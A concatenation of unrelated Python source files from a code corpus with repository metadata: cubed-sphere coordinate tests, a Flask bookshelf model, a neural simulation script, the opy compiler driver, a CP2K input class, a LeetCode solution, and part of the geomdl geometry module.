0, 1 (X, Y, Z) = xyp2xyz(x, y, panel) a_equal((X,Y,Z), (R*cos(alpha), R*sin(alpha), 0)) x, y, panel = a*tan(alpha), 0, 2 (X, Y, Z) = xyp2xyz(x, y, panel) a_equal((X,Y,Z), (-R*sin(alpha), R*cos(alpha), 0)) x, y, panel = 0, -a*tan(alpha), 2 (X, Y, Z) = xyp2xyz(x, y, panel) aa_equal((X,Y,Z), (0, R*sin(alpha), -R*cos(alpha)), 15) x, y, panel = a*tan(alpha), 0, 3 (X, Y, Z) = xyp2xyz(x, y, panel) a_equal((X,Y,Z), (-R*cos(alpha), -R*sin(alpha), 0)) x, y, panel = a*tan(alpha), 0, 4 (X, Y, Z) = xyp2xyz(x, y, panel) a_equal((X,Y,Z), (R*sin(alpha), -R*cos(alpha), 0)) x, y, panel = a*tan(alpha), 0, 5 (X, Y, Z) = xyp2xyz(x, y, panel) a_equal((X,Y,Z), (0, R*sin(alpha), -R*cos(alpha))) x, y, panel = a*tan(alpha), 0, 6 (X, Y, Z) = xyp2xyz(x, y, panel) a_equal((X,Y,Z), (0, R*sin(alpha), R*cos(alpha))) def test_xyz2xyp(): ''' xyz2xyp(): center of panel, at panel border ''' from cart_cs import xyz2xyp R = 1 a = R/sqrt(3) #------------------------------------------------ # center of panel #------------------------------------------------ xyp_dict = xyz2xyp(1, 0, 0) a_equal(xyp_dict, {1:(0.0,0)}) xyp_dict = xyz2xyp(0, 1, 0) a_equal(xyp_dict, {2:(0,0)}) xyp_dict = xyz2xyp(-1, 0, 0) a_equal(xyp_dict, {3:(0,0)}) xyp_dict = xyz2xyp(0, -1, 0) a_equal(xyp_dict, {4:(0,0)}) xyp_dict = xyz2xyp(0, 0, -1) a_equal(xyp_dict, {5:(0,0)}) xyp_dict = xyz2xyp(0, 0, 1) a_equal(xyp_dict, {6:(0,0)}) #------------------------------------------------ # at the panel border #------------------------------------------------ alpha = pi/4 at = a*tan(alpha) xyp_dict = xyz2xyp(R*cos(alpha), R*sin(alpha), 0) a_equal(list(xyp_dict.keys()), [1,2]) aa_equal(list(xyp_dict.values()), [(at,0), (-at,0)], 15) xyp_dict = xyz2xyp(-R*sin(alpha), R*cos(alpha), 0) a_equal(list(xyp_dict.keys()), [2,3]) aa_equal(list(xyp_dict.values()), [(at,0), (-at,0)], 15) xyp_dict = xyz2xyp(-R*cos(alpha), -R*sin(alpha), 0) a_equal(list(xyp_dict.keys()), [3,4]) aa_equal(list(xyp_dict.values()), [(at,0), (-at,0)], 15) xyp_dict = xyz2xyp(R*sin(alpha), -R*cos(alpha), 0) a_equal(list(xyp_dict.keys()), [1,4]) aa_equal(list(xyp_dict.values()), [(-at,0), (at,0)], 15) xyp_dict = xyz2xyp(0, R*sin(alpha), -R*cos(alpha)) a_equal(list(xyp_dict.keys()), [2,5]) aa_equal(list(xyp_dict.values()), [(0,-at), (at,0)], 15) xyp_dict = xyz2xyp(0, R*sin(alpha), R*cos(alpha)) a_equal(list(xyp_dict.keys()), [2,6]) aa_equal(list(xyp_dict.values()), [(0,at), (at,0)], 15) def test_xyp2xyz_xyz2xyp(): ''' xyp2xyz() -> xyz2xyp() : check consistency, repeat 1000 times ''' from cart_cs import xyp2xyz, xyz2xyp N = 1000 R = 1 a = R/sqrt(3) for i in range(N): panel = randint(1,7) alpha, beta = (pi/2)*rand(2) - pi/4 x, y = a*tan(alpha), a*tan(beta) (X, Y, Z) = xyp2xyz(x, y, panel) xyp_dict = xyz2xyp(X,Y,Z) aa_equal((x,y), xyp_dict[panel], 15)
7ba4723843b10f4bdde50acfefd5f04d1227d875
4344f7d6b3c26e8cb9c666ca0a1dc81d5d484fca
/4-auth/bookshelf/model_cloudsql.py
5ceac779fc83be92f4bf47d5d8bd2c1317916370
[ "Apache-2.0", "LicenseRef-scancode-unknown-license-reference" ]
permissive
dpebot/getting-started-python
5beec5a68738ae47ed4bb642a7f4a119052ee6b6
07ce28b40c9be8555cb8575b83d7ba836b6483f2
refs/heads/master
2020-12-26T04:38:09.399296
2016-08-03T18:16:30
2016-08-03T18:16:30
65,573,255
4
3
null
2016-08-12T17:59:13
2016-08-12T17:59:13
null
UTF-8
Python
false
false
3,043
py
# Copyright 2015 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from flask import Flask from flask.ext.sqlalchemy import SQLAlchemy builtin_list = list db = SQLAlchemy() def init_app(app): db.init_app(app) def from_sql(row): """Translates a SQLAlchemy model instance into a dictionary""" data = row.__dict__.copy() data['id'] = row.id data.pop('_sa_instance_state') return data class Book(db.Model): __tablename__ = 'books' id = db.Column(db.Integer, primary_key=True) title = db.Column(db.String(255)) author = db.Column(db.String(255)) publishedDate = db.Column(db.String(255)) imageUrl = db.Column(db.String(255)) description = db.Column(db.String(255)) createdBy = db.Column(db.String(255)) createdById = db.Column(db.String(255)) def __repr__(self): return "<Book(title='%s', author=%s)" % (self.title, self.author) def list(limit=10, cursor=None): cursor = int(cursor) if cursor else 0 query = (Book.query .order_by(Book.title) .limit(limit) .offset(cursor)) books = builtin_list(map(from_sql, query.all())) next_page = cursor + limit if len(books) == limit else None return (books, next_page) # [START list_by_user] def list_by_user(user_id, limit=10, cursor=None): cursor = int(cursor) if cursor else 0 query = (Book.query .filter_by(createdById=user_id) .order_by(Book.title) .limit(limit) .offset(cursor)) books = builtin_list(map(from_sql, query.all())) next_page = cursor + limit if len(books) == limit else None return (books, next_page) # [END list_by_user] def read(id): result = Book.query.get(id) if not result: return None return from_sql(result) def create(data): book = Book(**data) db.session.add(book) db.session.commit() return from_sql(book) def update(data, id): book = Book.query.get(id) for k, v in data.items(): setattr(book, k, v) db.session.commit() return from_sql(book) def delete(id): Book.query.filter_by(id=id).delete() db.session.commit() def _create_database(): """ If this script is run directly, create all the tables necessary to run the application. """ app = Flask(__name__) app.config.from_pyfile('../config.py') init_app(app) with app.app_context(): db.create_all() print("All tables created") if __name__ == '__main__': _create_database()
4bf42f64d15e50c0c51bbc1ad46db6a070cd95e2
d5d2ddfb2f6a4d025d0d323d343550d11990674f
/model/scripts/main_mutual_information_MSN.py
d3113bb158c04dbcb81800724706ff0a482a1844
[]
no_license
mickelindahl/dynsyn
5d710fa67d31f344c56c3b853b9d78af1f297fbf
c05a74c0f7dd977742ce55220d12270c03147e0f
refs/heads/master
2021-01-01T05:37:57.452690
2015-02-23T10:16:44
2015-02-23T10:16:44
30,537,438
1
1
null
null
null
null
UTF-8
Python
false
false
6,161
py
import numpy import pylab import os import sys import time as ttime # Get directory where model and code resides model_dir= '/'.join(os.getcwd().split('/')[0:-1]) code_dir= '/'.join(os.getcwd().split('/')[0:-2]) # Add model, code and current directories to python path sys.path.append(os.getcwd()) sys.path.append(model_dir) sys.path.append(code_dir+'/nest_toolbox') from simulation_utils import simulate_MSN from src import misc OUTPUT_PATH = os.getcwd()+'/output/' + sys.argv[0].split('/')[-1].split('.')[0] RUN=True # 48 minuter 200x10x10 HZS=numpy.linspace(5,50,10) N_MSNS=numpy.linspace(5,50,10) t=ttime.time() save_result_at=OUTPUT_PATH+'/main_mutual_information_raw_data.pkl' if RUN is False: count_dic={} for i_syn, syn in enumerate(['MSN_SNR_gaba_s_min', 'MSN_SNR_gaba_s_mid', 'MSN_SNR_gaba_s_max', 'MSN_SNR_gaba_p1']): count_dic[i_syn]={} for hz in numpy.linspace(5,50,10): count_dic[i_syn][hz]={} for N_MSN in numpy.linspace(5,50,10): count_dic[i_syn][hz][N_MSN]=[] for i in range(200): c, time= simulate_MSN(int(N_MSN), ['SNR_izh'], [syn], sim_time=1000, burst_onset=700, burst_offset=1000, burst_rate=hz, threads=1) count_dic[i_syn][hz][N_MSN].extend(c) count_dic[i_syn][hz][N_MSN]=numpy.array(count_dic[i_syn][hz][N_MSN]) misc.pickle_save([count_dic, time],save_result_at) else: #count_dic, time= misc.pickle_load(save_result_at) pass save_result_at=OUTPUT_PATH+'/main_mutual_information_prob.pkl' if RUN is False: c_prob=[] c_sum=[] for i in sorted(list(count_dic.keys())): c_prob.append([]) c_sum.append([]) for j, hz in enumerate(sorted(list(count_dic[i].keys()))): c_prob[i].append([]) c_sum[i].append([]) for N in sorted(list(count_dic[i][hz].keys())): c=count_dic[i][hz][N][2::3,:] # Pick out results for SNr c_conv=misc.convolve(c,bin_extent=100, kernel_type='rectangle') c_prob[i][j].append(numpy.sum(c_conv<1,axis=0)/float(c_conv.shape[0])) c_sum[i][j].append(numpy.sum(c,axis=0)) c_prob=numpy.array(c_prob) c_sum=numpy.array(c_sum) misc.pickle_save([c_prob, c_sum, time],save_result_at) else: c_prob, c_sum, time= misc.pickle_load(save_result_at) from numpy import * import pylab as p #import matplotlib.axes3d as p3 import mpl_toolkits.mplot3d.axes3d as p3 from matplotlib import cm #ax2=pylab.subplot(111) for i in range(c_sum.shape[0]): # x=[] y=[] z=[] #fig = pylab.figure() #ax1=pylab.subplot(111) for j in range(c_sum.shape[1]): x.append([]) y.append([]) z.append([]) for k in range(c_sum.shape[2]): x[j].append(HZS[j]) y[j].append(N_MSNS[k]) z[j].append(c_sum[i,j,k,770]) #z[j].append(c_prob[i,j,k,770]) if (i==1) and (j==1) and (k==9): fig = pylab.figure() ax=pylab.subplot(111) ax.plot(time, c_sum[i,j,k,:]) ax.plot(time, misc.convolve(c_sum[i,j,k,:], bin_extent=100, kernel_type='rectangle', single=True).transpose()) pylab.show() ax.set_xlabel('Spike count') #ax1.plot(c_sum[i,j,k,:]) #ax1.plot(c_prob[i,j,k,:]) x=numpy.array(x) y=numpy.array(y) z=numpy.array(z) # fig = pylab.figure() # ax = p3.Axes3D(fig) # ax.plot_surface(x, y, z, rstride=1, cstride=1, cmap=cm.jet) # ax.view_init(50, 135) # fig = pylab.figure() ax=pylab.subplot(111) for k in range(c_sum.shape[1]): ax.plot(x[:,k],z[:,k]) ax.set_xlabel('Firing rate (spikes/s)') fig = pylab.figure() ax=pylab.subplot(111) for k in range(c_sum.shape[2]): ax.plot(y[k,:],z[k,:]) ax.set_xlabel('Number of MSNs') #ax1.pcolor(numpy.array(z)) #pylab.colorbar() pylab.show() count=numpy.array(count_dic[1][5][5]) save_result_at=OUTPUT_PATH+'/main_mutual_information_convolved_raw_data.pkl' if RUN is True: count_conv=[] count_conv=misc.convolve(count, bin_extent=10, kernel_type='rectangle') misc.pickle_save([count_conv],save_result_at) else: count_conv= misc.pickle_load(save_result_at) count=count_conv save_result_at=OUTPUT_PATH+'/main_mutual_information_count_sr.pkl' if RUN is True: data=[] min_data=[] max_data=[] for i in range(3): data.append(numpy.array(count[i::3,:])) min_data.append(numpy.floor(numpy.min(count[i::3,:]))) max_data.append(numpy.ceil(numpy.max(count[i::3,:]))) #data[1]=data[0]+data[1] count_rs_list=[] print max_data for k in range(len(time)): count_rs=numpy.zeros((max_data[1]+1,max_data[2]+1)) nx=range(min_data[1], max_data[1]+2) ny=range(min_data[2], max_data[2]+2) count_rs, xedges, yedges = numpy.histogram2d(data[1][:,k], data[2][:,k], bins=(nx, ny)) count_rs_list.append(count_rs) misc.pickle_save([count_rs_list,data], save_result_at) else: count_rs_list, data=misc.pickle_load(save_result_at) ff=misc.fano_factor(data[2]) a=numpy.ones((2,2)) b=numpy.ones((3,3)) c=numpy.array([[1,2,3],[2,1,3],[3,2,1]]) d=numpy.array([[2,1],[2,2]]) mi_test=misc.mutual_information([d,c, a,b]) mi=misc.mutual_information(count_rs_list) max_data=[] for i in range(3): data.append(numpy.array(count[i::3])) max_data.append(numpy.max(count[i::3])) print count_rs_list[0].shape, max_data, len(count_rs_list) pylab.figure() pylab.plot(time, ff) pylab.figure() for i in range(3): pylab.subplot(3,1,i+1) pylab.plot(time, numpy.sum(data[i], axis=0)) print 'Simulation sime', (t-ttime.time()) / 60., 'min' pylab.show()
7be3f8d94e75750a876f1605eeeddd32844a7051
0131d8d133725aed18f0a5838ec49878c0a85cfe
/opy/opy_main.py
1775be52cabea2892d6e5dc6cf7990c94f7987ef
[ "Apache-2.0" ]
permissive
bysshe/oil
0d7e853adb2aa8560832eed72daf1284955b5573
62cd4928c0e71f9cd254062204227a8d8cf1cb23
refs/heads/master
2021-01-19T23:54:01.609581
2017-04-17T15:58:29
2017-04-17T21:53:30
null
0
0
null
null
null
null
UTF-8
Python
false
false
9,064
py
#!/usr/bin/python """ opy_main.py """ from __future__ import print_function import cStringIO import codecs import io import os import sys import marshal import logging # Like oil.py, set PYTHONPATH internally? So symlinks work? # Actually '.' is implicitly in PYTHONPATH, so we don't need it. # If we were in bin/oil.py, then we would need this. #this_dir = os.path.dirname(os.path.abspath(sys.argv[0])) #sys.path.append(os.path.join(this_dir)) from pgen2 import driver, pgen, grammar from pgen2 import token, tokenize import pytree from compiler2 import transformer from compiler2 import pycodegen from compiler2 import opcode from byterun import execfile from util_opy import log # From lib2to3/pygram.py. This takes the place of the 'symbol' module. # compiler/transformer module needs this. class Symbols(object): def __init__(self, gr): """Initializer. Creates an attribute for each grammar symbol (nonterminal), whose value is the symbol's type (an int >= 256). """ for name, symbol in gr.symbol2number.items(): setattr(self, name, symbol) #log('%s -> %d' % (name, symbol)) # For transformer to use self.number2symbol = gr.number2symbol #assert 0 def HostStdlibNames(): import symbol import token names = {} for k, v in symbol.sym_name.items(): names[k] = v for k, v in token.tok_name.items(): names[k] = v return names def _newer(a, b): """Inquire whether file a was written since file b.""" if not os.path.exists(a): return False if not os.path.exists(b): return True return os.path.getmtime(a) >= os.path.getmtime(b) def _generate_pickle_name(gt): head, tail = os.path.splitext(gt) if tail == ".txt": tail = "" return head + tail + ".".join(map(str, sys.version_info)) + ".pickle" def load_grammar(gt="Grammar.txt", gp=None, save=True, force=False, logger=None): """Load the grammar (maybe from a pickle).""" if logger is None: logger = logging.getLogger() gp = _generate_pickle_name(gt) if gp is None else gp if force or not _newer(gp, gt): logger.info("Generating grammar tables from %s", gt) g = pgen.generate_grammar(gt) if save: logger.info("Writing grammar tables to %s", gp) try: # calls pickle.dump on self.__dict__ after making it deterministic g.dump(gp) except OSError as e: logger.info("Writing failed: %s", e) else: g = grammar.Grammar() g.load(gp) # pickle.load() return g _READ_SOURCE_AS_UNICODE = True # Not sure why this doesn't work? It should be more like what the compiler # module expected. #_READ_SOURCE_AS_UNICODE = False # Emulate the interface that Transformer expects from parsermodule.c. class Pgen2PythonParser: def __init__(self, driver, start_symbol): self.driver = driver self.start_symbol = start_symbol def suite(self, text): # Python 3 #f = io.StringIO(text) f = cStringIO.StringIO(text) tokens = tokenize.generate_tokens(f.readline) tree = self.driver.parse_tokens(tokens, start_symbol=self.start_symbol) return tree def CountTupleTree(tu): """Count the nodes in a tuple parse tree.""" if isinstance(tu, tuple): s = 0 for entry in tu: s += CountTupleTree(entry) return s elif isinstance(tu, int): return 1 elif isinstance(tu, str): return 1 else: raise AssertionError(tu) class TupleTreePrinter: def __init__(self, names): self._names = names def Print(self, tu, f=sys.stdout, indent=0): ind = ' ' * indent f.write(ind) if isinstance(tu, tuple): f.write(self._names[tu[0]]) f.write('\n') for entry in tu[1:]: self.Print(entry, f, indent=indent+1) elif isinstance(tu, int): f.write(str(tu)) f.write('\n') elif isinstance(tu, str): f.write(str(tu)) f.write('\n') else: raise AssertionError(tu) def main(argv): grammar_path = argv[1] # NOTE: This is cached as a pickle gr = load_grammar(grammar_path) FILE_INPUT = gr.symbol2number['file_input'] symbols = Symbols(gr) pytree.Init(symbols) # for type_repr() pretty printing transformer.Init(symbols) # for _names and other dicts # In Python 2 code, always use from __future__ import print_function. try: del gr.keywords["print"] except KeyError: pass #do_glue = False do_glue = True if do_glue: # Make it a flag # Emulating parser.st structures from parsermodule.c. # They have a totuple() method, which outputs tuples like this. def py2st(gr, raw_node): type, value, context, children = raw_node # See pytree.Leaf if context: _, (lineno, column) = context else: lineno = 0 # default in Leaf column = 0 if children: return (type,) + tuple(children) else: return (type, value, lineno, column) convert = py2st else: convert = pytree.convert dr = driver.Driver(gr, convert=convert) action = argv[2] if action == 'stdlib-parse': # This is what the compiler/ package was written against. import parser py_path = argv[3] with open(py_path) as f: st = parser.suite(f.read()) tree = st.totuple() n = transformer.CountTupleTree(tree) log('COUNT %d', n) printer = TupleTreePrinter(HostStdlibNames()) printer.Print(tree) elif action == 'parse': py_path = argv[3] with open(py_path) as f: tokens = tokenize.generate_tokens(f.readline) tree = dr.parse_tokens(tokens, start_symbol=FILE_INPUT) if isinstance(tree, tuple): n = CountTupleTree(tree) log('COUNT %d', n) printer = TupleTreePrinter(transformer._names) printer.Print(tree) else: tree.PrettyPrint(sys.stdout) log('\tChildren: %d' % len(tree.children), file=sys.stderr) elif action == 'old-compile': py_path = argv[3] out_path = argv[4] if do_glue: py_parser = Pgen2PythonParser(dr, FILE_INPUT) printer = TupleTreePrinter(transformer._names) tr = transformer.Pgen2Transformer(py_parser, printer) else: tr = transformer.Transformer() # for Python 2.7 compatibility: if _READ_SOURCE_AS_UNICODE: f = codecs.open(py_path, encoding='utf-8') else: f = open(py_path) contents = f.read() co = pycodegen.compile(contents, py_path, 'exec', transformer=tr) log("Code length: %d", len(co.co_code)) # Write the .pyc file with open(out_path, 'wb') as out_f: h = pycodegen.getPycHeader(py_path) out_f.write(h) marshal.dump(co, out_f) elif action == 'compile': # 'opy compile' is pgen2 + compiler2 # TODO: import compiler2 #raise NotImplementedError py_path = argv[3] out_path = argv[4] if do_glue: py_parser = Pgen2PythonParser(dr, FILE_INPUT) printer = TupleTreePrinter(transformer._names) tr = transformer.Pgen2Transformer(py_parser, printer) else: tr = transformer.Transformer() with open(py_path) as f: contents = f.read() co = pycodegen.compile(contents, py_path, 'exec', transformer=tr) log("Code length: %d", len(co.co_code)) # Write the .pyc file with open(out_path, 'wb') as out_f: h = pycodegen.getPycHeader(py_path) out_f.write(h) marshal.dump(co, out_f) elif action == 'compile2': in_path = argv[3] out_path = argv[4] from compiler2 import pycodegen as pycodegen2 from misc import stdlib_compile stdlib_compile.compileAndWrite(in_path, out_path, pycodegen2.compile) elif action == 'run': # TODO: Add an option like -v in __main__ #level = logging.DEBUG if args.verbose else logging.WARNING #logging.basicConfig(level=level) #logging.basicConfig(level=logging.DEBUG) # Compile and run, without writing pyc file py_path = argv[3] opy_argv = argv[3:] if py_path.endswith('.py'): py_parser = Pgen2PythonParser(dr, FILE_INPUT) printer = TupleTreePrinter(transformer._names) tr = transformer.Pgen2Transformer(py_parser, printer) with open(py_path) as f: contents = f.read() co = pycodegen.compile(contents, py_path, 'exec', transformer=tr) execfile.run_code_object(co, opy_argv) elif py_path.endswith('.pyc') or py_path.endswith('.opyc'): with open(py_path) as f: f.seek(8) # past header. TODO: validate it! co = marshal.load(f) execfile.run_code_object(co, opy_argv) else: raise RuntimeError('Invalid path %r' % py_path) else: raise RuntimeError('Invalid action %r' % action) # Examples of nodes Leaf(type, value): # Leaf(1, 'def') # Leaf(4, '\n') # Leaf(8, ')') # Oh are these just tokens? # yes. # Node(prefix, children) if __name__ == '__main__': try: main(sys.argv) except RuntimeError as e: log('FATAL: %s', e) sys.exit(1)
28cd2ba0f453c1e05fbe64bea3586c73a9f79d23
f3bd271bf00325881fb5b2533b9ef7f7448a75ec
/xcp2k/classes/_ic1.py
dfa06f08d6b858b4ef14780d7a8e80c0a989bcb7
[]
no_license
obaica/xcp2k
7f99fc9d494859e16b9b0ea8e217b0493f4b2f59
6e15c2c95658f545102595dc1783f5e03a9e6916
refs/heads/master
2020-07-15T17:27:43.378835
2019-02-11T16:32:24
2019-02-11T16:32:24
null
0
0
null
null
null
null
UTF-8
Python
false
false
849
py
from xcp2k.inputsection import InputSection class _ic1(InputSection): def __init__(self): InputSection.__init__(self) self.Print_ic_list = None self.Eps_dist = None self.Optimize_homo_lumo = None self.Gw_eigenvalues = None self.Gw_eigenvalues_beta = None self._name = "IC" self._keywords = {'Optimize_homo_lumo': 'OPTIMIZE_HOMO_LUMO', 'Gw_eigenvalues': 'GW_EIGENVALUES', 'Eps_dist': 'EPS_DIST', 'Print_ic_list': 'PRINT_IC_LIST', 'Gw_eigenvalues_beta': 'GW_EIGENVALUES_BETA'} self._aliases = {'Optimize': 'Optimize_homo_lumo'} @property def Optimize(self): """ See documentation for Optimize_homo_lumo """ return self.Optimize_homo_lumo @Optimize.setter def Optimize(self, value): self.Optimize_homo_lumo = value
5f7c905b69a5173153cc985d9e73093dceb5a83f
5c531de5e4759c904e608b4fc653b2b041f79a0e
/Amazon_735. Asteroid Collision.py
6737b4cae3d0689e2f94c48aac92eb951b2c6267
[]
no_license
jianhui-ben/leetcode_python
133c7e6e5c7316d00607ba2e327239e002de28b2
fcc16124cc24a5993e27f5d97e78d8f290e68230
refs/heads/master
2022-06-05T22:32:18.034581
2022-05-17T02:27:11
2022-05-17T02:27:11
250,683,308
0
0
null
null
null
null
UTF-8
Python
false
false
2,407
py
#735. Asteroid Collision #We are given an array asteroids of integers representing asteroids in a row. #For each asteroid, the absolute value represents its size, and the sign represents #its direction (positive meaning right, negative meaning left). Each asteroid moves #at the same speed. #Find out the state of the asteroids after all collisions. If two asteroids meet, #the smaller one will explode. If both are the same size, both will explode. Two #asteroids moving in the same direction will never meet. #Example 1: #Input: asteroids = [5,10,-5] #Output: [5,10] #Explanation: The 10 and -5 collide resulting in 10. The 5 and 10 never collide. #Example 2: #Input: asteroids = [8,-8] #Output: [] #Explanation: The 8 and -8 collide exploding each other. class Solution: def asteroidCollision(self, asteroids: List[int]) -> List[int]: ##better method: out=[] for star in asteroids: while out and out[-1]>0 and star<0: if abs(out[-1])>abs(star): break elif abs(out[-1])<abs(star): out.pop() elif abs(out[-1])==abs(star): out.pop() break else: out.append(star) return out # ##Ben's method # positive=False # temp=[] # add_negative=True # for i in range(len(asteroids)): # if asteroids[i] < 0 and not positive: # temp.append(asteroids[i]) # elif asteroids[i]>=0: # positive=True # temp.append(asteroids[i]) # elif asteroids[i]<0 and positive: # while len(temp)>0 and temp[-1]>0: # last_positive=temp.pop() # if last_positive+ asteroids[i]>0: # temp.append(last_positive) # break # elif last_positive+ asteroids[i]==0: # add_negative=False # break # if (len(temp)==0 or temp[-1]<=0) and add_negative: temp.append(asteroids[i]) # add_negative=True # if not temp: positive=False # else: positive= temp[-1]>=0 # add_negative=True # return temp
4b6a65ee5967997a435363f289387f57cd5f8fef
36dbd31536a4084db83d12b2bd12a9f22f4da636
/geomdl/abstract.py
614834b2701d5c774f0342a7c385090e5edb4f75
[ "Python-2.0", "MIT" ]
permissive
Hgser/NURBS-Python
75d38a21721d9afd3d5f8491bf8ba56d71a2285a
ced4debdf4fc13afce9b830a2962da2789e5c45b
refs/heads/master
2020-04-27T00:42:17.632484
2019-02-28T05:21:20
2019-02-28T05:21:20
null
0
0
null
null
null
null
UTF-8
Python
false
false
103,171
py
""" .. module:: abstract :platform: Unix, Windows :synopsis: Provides abstract base classes for parametric shapes .. moduleauthor:: Onur Rauf Bingol <[email protected]> """ import copy import abc import six import warnings from .evaluators import AbstractEvaluator from .tessellate import AbstractTessellate from . import vis from . import helpers from . import utilities from . import voxelize from .exceptions import GeomdlException @six.add_metaclass(abc.ABCMeta) class Geometry(object): """ Abstract base class for defining geometry elements. This class provides the following properties: * :py:attr:`name` * :py:attr:`evalpts` **Keyword Arguments:** * ``precision``: number of decimal places to round to. *Default: 18* """ def __init__(self, **kwargs): self._precision = int(kwargs.get('precision', 18)) # number of decimal places to round to self._array_type = list if not hasattr(self, '_array_type') else self._array_type self._eval_points = self._init_array() # evaluated points self._name = "Geometry object" # descriptor field self._iter_index = 0 # iterator index self._cache = {} # cache dictionary def __iter__(self): self._iter_index = 0 return self def next(self): return self.__next__() def __next__(self): if self._iter_index > 0: raise StopIteration self._iter_index += 1 return self def __len__(self): return 1 def __copy__(self): cls = self.__class__ result = cls.__new__(cls) result.__dict__.update(self.__dict__) return result def __deepcopy__(self, memo): # Don't copy self reference cls = self.__class__ result = cls.__new__(cls) memo[id(self)] = result # Don't copy the cache memo[id(self._cache)] = self._cache.__new__(dict) # Copy all other attributes for k, v in self.__dict__.items(): setattr(result, k, copy.deepcopy(v, memo)) return result def __str__(self): return self.name __repr__ = __str__ def _init_array(self): """ Initializes the arrays. """ if callable(self._array_type): return self._array_type() return list() @property def name(self): """ Descriptor field for storing the shape identification data, such as names, ID numbers, etc. Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details on using this class member. :getter: Gets the descriptor :setter: Sets the descriptor :type: str """ return self._name @name.setter def name(self, value): self._name = value @property def evalpts(self): """ Evaluated points. Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details on using this class member. :getter: Gets the coordinates of the evaluated points :type: list """ if self._eval_points is None or len(self._eval_points) == 0: self.evaluate() return self._eval_points @abc.abstractmethod def evaluate(self, **kwargs): """ Abstract method for the implementation of evaluation algorithm. .. note:: This is an abstract method and it must be implemented in the subclass. """ pass @six.add_metaclass(abc.ABCMeta) class SplineGeometry(Geometry): """ Abstract base class for defining spline geometries. This class provides the following properties: * :py:attr:`name` * :py:attr:`rational` * :py:attr:`dimension` * :py:attr:`pdimension` * :py:attr:`degree` * :py:attr:`knotvector` * :py:attr:`ctrlpts` * :py:attr:`ctrlpts_size` * :py:attr:`weights` (for completeness with the rational spline implementations) * :py:attr:`evalpts` * :py:attr:`bbox` * :py:attr:`evaluator` * :py:attr:`vis` **Keyword Arguments:** * ``precision``: number of decimal places to round to. *Default: 18* * ``normalize_kv``: if True, knot vector(s) will be normalized to [0,1] domain. *Default: True* * ``find_span_func``: default knot span finding algorithm. *Default:* :func:`.helpers.find_span_linear` """ def __init__(self, **kwargs): super(SplineGeometry, self).__init__(**kwargs) self._pdim = 0 if not hasattr(self, '_pdim') else self._pdim # parametric dimension self._dinit = 0.1 if not hasattr(self, '_dinit') else self._dinit # evaluation delta init value self._rational = False # defines whether the B-spline object is rational or not self._dimension = 0 # spatial dimension self._degree = [0 for _ in range(self._pdim)] # degree self._knot_vector = [self._init_array() for _ in range(self._pdim)] # knot vector self._control_points = self._init_array() # control points self._control_points_size = [0 for _ in range(self._pdim)] # control points length self._delta = [self._dinit for _ in range(self._pdim)] # evaluation delta self._bounding_box = self._init_array() # bounding box self._evaluator = None # evaluator instance self._vis_component = None # visualization component self._span_func = kwargs.get('find_span_func', helpers.find_span_linear) # default "find_span" function self._kv_normalize = kwargs.get('normalize_kv', True) # flag to control knot vector normalization @property def rational(self): """ Defines the rational and non-rational B-spline shapes. Rational shapes use homogeneous coordinates which includes a weight alongside with the Cartesian coordinates. Rational B-splines are also named as NURBS (Non-uniform rational basis spline) and non-rational B-splines are sometimes named as NUBS (Non-uniform basis spline) or directly as B-splines. Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details on using this class member. :getter: Returns True is the B-spline object is rational (NURBS) :type: bool """ return self._rational @property def dimension(self): """ Spatial dimension. Spatial dimension will be automatically estimated from the first element of the control points array. Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details on using this class member. :getter: Gets the spatial dimension, e.g. 2D, 3D, etc. :type: int """ if self._rational: return self._dimension - 1 return self._dimension @property def pdimension(self): """ Parametric dimension. Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details on using this class member. :getter: Gets the parametric dimension :type: int """ return self._pdim @property def degree(self): """ Degree :getter: Gets the degree :setter: Sets the degree :type: list """ return self._degree @degree.setter def degree(self, value): self._degree = value @property def knotvector(self): """ Knot vector :getter: Gets the knot vector :setter: Sets the knot vector :type: list """ return self._knot_vector @knotvector.setter def knotvector(self, value): self._knot_vector = value @property def ctrlpts(self): """ Control points. Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details on using this class member. :getter: Gets the control points :setter: Sets the control points :type: list """ return self._control_points @ctrlpts.setter def ctrlpts(self, value): self._control_points = value @property def ctrlpts_size(self): """ Total number of control points. :getter: Gets the total number of control points :type: int """ res = 1 for sz in self._control_points_size: res *= sz return res @property def weights(self): """ Weights. Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details on using this class member. :getter: Gets the weights :setter: Sets the weights """ return None @weights.setter def weights(self, value): pass @property def domain(self): """ Domain. Domain is determined using the knot vector(s). :getter: Gets the domain """ retval = [] for idx, kv in enumerate(self._knot_vector): retval.append((kv[self._degree[idx]], kv[-(self._degree[idx] + 1)])) return retval[0] if self._pdim == 1 else retval @property def range(self): """ Domain range. :getter: Gets the range """ retval = [] for idx, kv in enumerate(self._knot_vector): retval.append(kv[-(self._degree[idx]) + 1] - kv[self._degree[idx]]) return retval[0] if self._pdim == 1 else retval @property def bbox(self): """ Bounding box. Evaluates the bounding box and returns the minimum and maximum coordinates. Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details on using this class member. :getter: Gets the bounding box :type: tuple """ if self._bounding_box is None or len(self._bounding_box) == 0: self._bounding_box = utilities.evaluate_bounding_box(self.ctrlpts) return self._bounding_box @property def evaluator(self): """ Evaluator instance. Evaluators allow users to use different algorithms for B-Spline and NURBS evaluations. Please see the documentation on ``Evaluator`` classes. Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details on using this class member. :getter: Gets the current Evaluator instance :setter: Sets the Evaluator instance :type: evaluators.AbstractEvaluator """ return self._evaluator @evaluator.setter def 